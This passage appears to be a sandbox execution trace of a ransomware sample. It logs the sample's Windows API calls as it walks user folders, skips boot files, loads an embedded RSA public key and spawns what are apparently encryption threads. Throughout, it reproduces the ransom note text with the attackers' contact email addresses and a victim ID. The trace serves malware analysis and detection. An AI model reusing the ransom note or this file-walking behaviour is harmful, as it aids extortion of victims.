number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.314] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.314] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.314] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.314] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0259.315] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.315] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.315] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0259.315] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0259.315] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0259.315] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0259.315] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0259.315] SetErrorMode (uMode=0x1) returned 0x1 [0259.315] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0259.315] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0259.315] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0259.315] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*" [0259.315] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0259.315] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.315] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0259.315] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*" [0259.315] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="Desktop") returned 0x0 [0259.315] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="DESKTOP") returned 0x0 [0259.315] SetErrorMode (uMode=0x1) returned 0x1 [0259.315] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0259.315] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0259.315] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.315] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x14f4) returned 0x0 [0259.315] RegQueryValueExW (in: hKey=0x14f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e50b0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43e50b0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0259.315] RegCloseKey (hKey=0x14f4) returned 0x0 [0259.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.316] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.316] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.316] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.316] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0259.316] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0259.316] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0259.316] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0259.316] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0259.316] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0259.316] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0259.317] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0259.317] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0259.317] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0259.317] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0259.317] SetErrorMode (uMode=0x1) returned 0x1 [0259.317] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0259.317] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0259.317] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Downloads\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0259.317] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*" [0259.317] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.317] PathFindFileNameW (pszPath="C:\\Users\\Default\\Downloads") returned="Downloads" [0259.317] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0259.317] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0259.317] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0259.317] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0259.317] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0259.317] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0259.317] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="Desktop") returned 0x0 [0259.317] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0259.317] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned 31 [0259.317] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.317] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.317] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned="\\\\?\\C:\\Users\\Default\\Downloads\\" [0259.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14f8 [0259.318] Sleep (dwMilliseconds=0x96) [0259.464] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0259.464] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0259.465] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0259.465] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0259.465] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*" [0259.465] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="Desktop") returned 0x0 [0259.465] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0259.465] SetErrorMode (uMode=0x1) returned 0x1 [0259.465] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT") returned 48 [0259.465] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0259.465] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.465] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x14fc) returned 0x0 [0259.465] RegQueryValueExW (in: hKey=0x14fc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e52e0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43e52e0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0259.465] RegCloseKey (hKey=0x14fc) returned 0x0 [0259.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.465] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.465] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.465] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.466] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.466] PathFindFileNameW (pszPath="C:\\Users\\Default\\Downloads") returned="Downloads" [0259.466] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0259.466] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0259.466] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0259.466] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0259.466] SetErrorMode (uMode=0x1) returned 0x1 [0259.466] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0259.466] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0259.466] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0259.466] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*" [0259.466] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.466] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites") returned="Favorites" [0259.466] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0259.466] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0259.466] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0259.466] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0259.466] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0259.466] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0259.466] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="Desktop") returned 0x0 [0259.466] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0259.466] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned 31 [0259.466] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.466] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.466] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\" [0259.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1504 [0259.467] Sleep (dwMilliseconds=0x96) [0259.620] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.620] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.620] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.620] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0259.620] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0259.621] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0259.621] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0259.621] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0259.621] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*" [0259.621] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="Desktop") returned 0x0 [0259.621] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0259.621] SetErrorMode (uMode=0x1) returned 0x1 [0259.621] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT") returned 48 [0259.621] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0259.621] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.621] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1508) returned 0x0 [0259.621] RegQueryValueExW (in: hKey=0x1508, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e5510, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43e5510*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0259.621] RegCloseKey (hKey=0x1508) returned 0x0 [0259.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.621] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.621] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.621] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.622] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.622] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites") returned="Favorites" [0259.622] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0259.622] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0259.622] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0259.622] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0259.622] SetErrorMode (uMode=0x1) returned 0x1 [0259.622] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0259.622] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0259.622] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") 